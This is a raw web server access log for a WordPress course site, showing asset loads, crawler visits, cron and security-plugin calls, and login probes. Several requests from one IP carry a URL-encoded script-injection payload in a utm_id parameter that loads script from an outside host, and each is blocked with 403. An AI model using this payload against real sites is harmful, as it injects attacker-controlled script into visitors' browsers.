5.122.156.209 - - [02/May/2025:19:12:43 +0330] "GET /wp-content/uploads/essential-addons-elementor/eael-18728.js?ver=1740261835 HTTP/2" 200 974 "https://optimyar.com/courses/robust-optimization-d99-all/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:43 +0330] "GET /wp-includes/js/comment-reply.min.js?ver=6.8.1 HTTP/2" 200 1247 "https://optimyar.com/courses/robust-optimization-d99-all/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:43 +0330] "GET /wp-content/plugins/akismet/_inc/akismet-frontend.js?ver=1740841587 HTTP/2" 200 3015 "https://optimyar.com/courses/robust-optimization-d99-all/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:43 +0330] "GET /wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver=3.28.3 HTTP/2" 200 2624 "https://optimyar.com/courses/robust-optimization-d99-all/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:43 +0330] "GET /wp-content/plugins/wpdiscuz/assets/js/wpdiscuz-combo.min.js?ver=7.6.29 HTTP/2" 200 67116 "https://optimyar.com/courses/robust-optimization-d99-all/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:43 +0330] "GET /wp-content/uploads/2022/03/Untitled-1-1-300x300.png HTTP/2" 200 46130 "https://optimyar.com/courses/robust-optimization-d99-all/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:43 +0330] "GET /wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.28.4 HTTP/2" 200 2228 "https://optimyar.com/courses/robust-optimization-d99-all/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:43 +0330] "GET /wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.28.4 HTTP/2" 200 14421 "https://optimyar.com/courses/robust-optimization-d99-all/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:43 +0330] "GET /wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6 HTTP/2" 200 1571 "https://optimyar.com/courses/robust-optimization-d99-all/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:43 +0330] "GET /wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6 HTTP/2" 200 3542 "https://optimyar.com/courses/robust-optimization-d99-all/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:43 +0330] "GET /wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.28.3 HTTP/2" 200 6279 "https://optimyar.com/courses/robust-optimization-d99-all/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:43 +0330] "GET /wp-includes/js/jquery/ui/core.min.js?ver=1.13.3 HTTP/2" 200 6812 "https://optimyar.com/courses/robust-optimization-d99-all/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:43 +0330] "GET /wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.28.4 HTTP/2" 200 13099 "https://optimyar.com/courses/robust-optimization-d99-all/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:43 +0330] "GET /wp-content/plugins/elementor-pro/assets/js/elements-handlers.min.js?ver=3.28.3 HTTP/2" 200 10224 "https://optimyar.com/courses/robust-optimization-d99-all/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:43 +0330] "GET /wp-content/plugins/jet-blocks/assets/js/jet-blocks.min.js?ver=1.3.18 HTTP/2" 200 5286 "https://optimyar.com/courses/robust-optimization-d99-all/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:43 +0330] "GET /wp-content/plugins/jet-elements/assets/js/jet-elements.min.js?ver=2.7.5.1 HTTP/2" 200 24555 "https://optimyar.com/courses/robust-optimization-d99-all/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:43 +0330] "GET /wp-content/plugins/jet-tabs/assets/js/jet-tabs-frontend.min.js?ver=2.2.8 HTTP/2" 200 5800 "https://optimyar.com/courses/robust-optimization-d99-all/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:43 +0330] "GET /wp-content/plugins/elementskit-lite/widgets/init/assets/js/animate-circle.min.js?ver=3.5.0 HTTP/2" 200 393 "https://optimyar.com/courses/robust-optimization-d99-all/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:43 +0330] "GET /wp-content/plugins/elementskit-lite/widgets/init/assets/js/elementor.js?ver=3.5.0 HTTP/2" 200 5290 "https://optimyar.com/courses/robust-optimization-d99-all/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:43 +0330] "GET /wp-content/plugins/elementor-extras/assets/js/frontend.min.js?ver=2.2.52 HTTP/2" 200 17222 "https://optimyar.com/courses/robust-optimization-d99-all/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:43 +0330] "GET /wp-content/plugins/elementor-extras/assets/lib/parallax-gallery/parallax-gallery.min.js?ver=1.0.0 HTTP/2" 200 814 "https://optimyar.com/courses/robust-optimization-d99-all/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:43 +0330] "GET /wp-content/plugins/elementor-extras/assets/lib/hotips/hotips.min.js?ver=1.1.0 HTTP/2" 200 2121 "https://optimyar.com/courses/robust-optimization-d99-all/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:43 +0330] "GET /wp-content/plugins/shortcodes-ultimate/includes/css/rtl-shortcodes.css?ver=7.3.5 HTTP/2" 200 348 "https://optimyar.com/courses/robust-optimization-d99-all/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:43 +0330] "GET /wp-content/uploads/2020/12/logo2.png HTTP/2" 200 4490 "https://optimyar.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:46 +0330] "GET /wp-content/uploads/2021/10/cropped-logo1-32x32.png HTTP/1.1" 200 2372 "https://optimyar.com/courses/robust-optimization-d99-all/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:46 +0330] "GET /wp-content/uploads/2021/10/cropped-logo1-192x192.png HTTP/1.1" 200 26881 "https://optimyar.com/courses/robust-optimization-d99-all/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:46 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANSansX/IRANSansX-DemiBold.woff2 HTTP/1.1" 200 4882 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:46 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANSansX/IRANSansX-Medium.woff2 HTTP/1.1" 200 45884 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:46 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/Gandom/Gandom.woff2 HTTP/1.1" 200 49776 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:46 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/Parastoo/Parastoo-Bold.woff2 HTTP/1.1" 200 48268 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:46 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANSansX/IRANSansX-DemiBold.woff2 HTTP/1.1" 200 45640 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:46 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANSansX/IRANSansX-Bold.woff2 HTTP/1.1" 200 46124 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:46 +0330] "GET /wp-content/plugins/elementor/assets/lib/font-awesome/webfonts/fa-solid-900.woff2 HTTP/1.1" 200 78196 "https://optimyar.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=5.15.3" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:46 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANYekanX/IRANYekanX-DemiBold.woff2 HTTP/1.1" 200 39896 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:46 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANYekanX/IRANYekanX-Medium.woff2 HTTP/1.1" 200 39256 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:46 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANYekanX/IRANYekanX-Bold.woff2 HTTP/1.1" 200 40348 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:46 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANYekanX/IRANYekanX-DemiBold.woff2 HTTP/1.1" 200 0 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:46 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANYekanX/IRANYekanX-Black.woff2 HTTP/1.1" 200 37296 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:46 +0330] "GET /wp-content/plugins/elementor/assets/lib/font-awesome/webfonts/fa-regular-400.woff2 HTTP/1.1" 200 13276 "https://optimyar.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/regular.min.css?ver=5.15.3" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:46 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANSansX/IRANSansX-Regular.woff2 HTTP/1.1" 200 40852 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:46 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/Tanha/Tanha.woff2 HTTP/1.1" 200 41476 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:46 +0330] "GET /wp-content/plugins/elementor/assets/lib/font-awesome/webfonts/fa-brands-400.woff2 HTTP/1.1" 200 81612 "https://optimyar.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=5.15.3" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:46 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANSansX/IRANSansX-Light.woff2 HTTP/1.1" 200 44932 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:46 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANSansX/IRANSansX-Regular.woff2 HTTP/1.1" 200 0 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:46 +0330] "GET /wp-content/plugins/persian-elementor/includes/icons/efaicons/fonts/efaicons.woff2 HTTP/1.1" 200 24716 "https://optimyar.com/wp-content/plugins/persian-elementor/includes/icons/efaicons/style.css?ver=2.13.9" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:46 +0330] "GET /wp-content/plugins/elementskit-lite/modules/elementskit-icon-pack/assets/fonts/elementskit.woff?y24e1e HTTP/1.1" 200 459560 "https://optimyar.com/wp-content/plugins/elementskit-lite/modules/elementskit-icon-pack/assets/css/ekiticons.css?ver=3.5.0" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:46 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANYekanX/IRANYekanX-Bold.woff2 HTTP/1.1" 200 40348 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:46 +0330] "GET /wp-includes/js/wp-emoji-release.min.js?ver=6.8.1 HTTP/1.1" 200 4771 "https://optimyar.com/courses/robust-optimization-d99-all/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:47 +0330] "GET /wp-content/plugins/wpdiscuz/assets/third-party/font-awesome-5.13.0/webfonts/fa-solid-900.woff2 HTTP/1.1" 200 79444 "https://optimyar.com/wp-content/plugins/wpdiscuz/assets/third-party/font-awesome-5.13.0/css/fa.min.css?ver=7.6.29" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:47 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANYekanX/IRANYekanX-Regular.woff2 HTTP/1.1" 200 35928 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:47 +0330] "GET /wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.9.3 HTTP/1.1" 200 3487 "https://optimyar.com/courses/robust-optimization-d99-all/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:47 +0330] "GET /wp-content/plugins/wpdiscuz/assets/third-party/font-awesome-5.13.0/webfonts/fa-regular-400.woff2 HTTP/1.1" 200 13584 "https://optimyar.com/wp-content/plugins/wpdiscuz/assets/third-party/font-awesome-5.13.0/css/fa.min.css?ver=7.6.29" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:47 +0330] "GET /wp-content/plugins/wpdiscuz/assets/third-party/font-awesome-5.13.0/webfonts/fa-brands-400.woff2 HTTP/1.1" 200 76612 "https://optimyar.com/wp-content/plugins/wpdiscuz/assets/third-party/font-awesome-5.13.0/css/fa.min.css?ver=7.6.29" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
44.208.193.63 - - [02/May/2025:19:12:47 +0330] "GET /courses/robust-multi-objective-optimization/ HTTP/1.1" 200 77079 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
5.122.156.209 - - [02/May/2025:19:12:51 +0330] "GET /wp-content/plugins/elementor-pro/assets/js/nav-menu.a23fbd67486c5bedf26c.bundle.min.js HTTP/1.1" 200 1751 "https://optimyar.com/courses/robust-optimization-d99-all/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:12:53 +0330] "GET /wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.36.0 HTTP/1.1" 200 99440 "https://optimyar.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5.36.0" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:13:02 +0330] "GET /wp-content/plugins/elementor/assets/js/text-editor.c084ef86600b6f11690d.bundle.min.js HTTP/1.1" 200 621 "https://optimyar.com/courses/robust-optimization-d99-all/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:13:11 +0330] "GET /wp-content/plugins/elementor-pro/assets/js/share-buttons.63d984f8c96d1e053bc0.bundle.min.js HTTP/1.1" 200 690 "https://optimyar.com/courses/robust-optimization-d99-all/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
5.122.156.209 - - [02/May/2025:19:13:11 +0330] "GET /wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.28.4 HTTP/1.1" 200 1072 "https://optimyar.com/courses/robust-optimization-d99-all/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0"
31.214.174.196 - - [02/May/2025:19:15:01 +0330] "POST /wp-cron.php?doing_wp_cron=1746200701.2707760334014892578125 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
91.142.73.116 - - [02/May/2025:19:14:59 +0330] "GET / HTTP/1.0" 200 279171 "https://optimyar.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
31.214.174.196 - - [02/May/2025:19:12:38 +0330] "POST /?wordfence_syncAttackData=1746200558.1129 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
44.193.102.198 - - [02/May/2025:19:13:29 +0330] "GET /wp-content/uploads/ac_assets/content_box_zoom_effect/blox_thumbs/ HTTP/1.1" 403 787 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
94.102.49.19 - - [02/May/2025:19:20:56 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
31.214.174.196 - - [02/May/2025:19:27:07 +0330] "POST /?wordfence_syncAttackData=1746201427.0678 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
31.214.174.196 - - [02/May/2025:19:27:08 +0330] "POST /wp-cron.php?doing_wp_cron=1746201428.8657600879669189453125 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
107.175.149.167 - - [02/May/2025:19:27:04 +0330] "GET / HTTP/1.0" 200 279171 "https://optimyar.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
94.102.49.19 - - [02/May/2025:19:32:13 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [02/May/2025:19:32:14 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
178.20.47.39 - - [02/May/2025:19:39:07 +0330] "GET / HTTP/1.0" 200 279171 "https://optimyar.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
107.175.149.167 - - [02/May/2025:19:27:16 +0330] "GET / HTTP/1.0" 200 279171 "https://optimyar.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
107.175.149.167 - - [02/May/2025:19:27:24 +0330] "GET / HTTP/1.0" 200 279171 "https://optimyar.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
31.214.174.196 - - [02/May/2025:19:39:09 +0330] "POST /?wordfence_syncAttackData=1746202149.2372 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
31.214.174.196 - - [02/May/2025:19:39:11 +0330] "POST /wp-cron.php?doing_wp_cron=1746202151.1490368843078613281250 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
66.249.64.128 - - [02/May/2025:19:44:39 +0330] "GET /wp-content/plugins/elementskit-lite/widgets/init/assets/js/animate-circle.min.js?ver=3.5.0 HTTP/1.1" 200 393 "https://optimyar.com/?o=273852384" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
94.102.49.19 - - [02/May/2025:19:45:07 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [02/May/2025:19:45:08 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
93.123.109.101 - - [02/May/2025:19:48:16 +0330] "GET /wp-includes/js/wp-emoji-release.min.js HTTP/1.1" 200 4771 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/121.0.0.0"
31.214.174.196 - - [02/May/2025:19:49:35 +0330] "POST /?wordfence_syncAttackData=1746202775.5133 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
94.102.49.19 - - [02/May/2025:19:50:18 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
31.214.174.196 - - [02/May/2025:19:53:38 +0330] "POST /?wordfence_syncAttackData=1746203017.9964 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
31.214.174.196 - - [02/May/2025:19:49:37 +0330] "POST /wp-cron.php?doing_wp_cron=1746202777.2838289737701416015625 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
45.140.206.15 - - [02/May/2025:19:49:34 +0330] "GET /admin HTTP/1.1" 404 15317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203"
122.114.59.75 - - [02/May/2025:19:53:35 +0330] "GET /wp-login.php HTTP/2" 302 20 "http://optimyar.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
92.205.215.142 - - [02/May/2025:19:54:47 +0330] "GET /wp-login.php HTTP/2" 302 20 "http://optimyar.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
31.214.174.196 - - [02/May/2025:20:06:13 +0330] "POST /?wordfence_syncAttackData=1746203773.2925 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
31.214.174.196 - - [02/May/2025:20:06:15 +0330] "POST /wp-cron.php?doing_wp_cron=1746203775.0967268943786621093750 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
54.36.148.230 - - [02/May/2025:20:06:12 +0330] "GET /sitemap_index.xml HTTP/2" 200 344 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.23 - - [02/May/2025:20:06:25 +0330] "GET /post-sitemap.xml HTTP/2" 200 832 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.204 - - [02/May/2025:20:06:32 +0330] "GET /page-sitemap.xml HTTP/2" 200 4657 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.214 - - [02/May/2025:20:06:39 +0330] "GET /elementskit_content-sitemap.xml HTTP/2" 200 1565 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
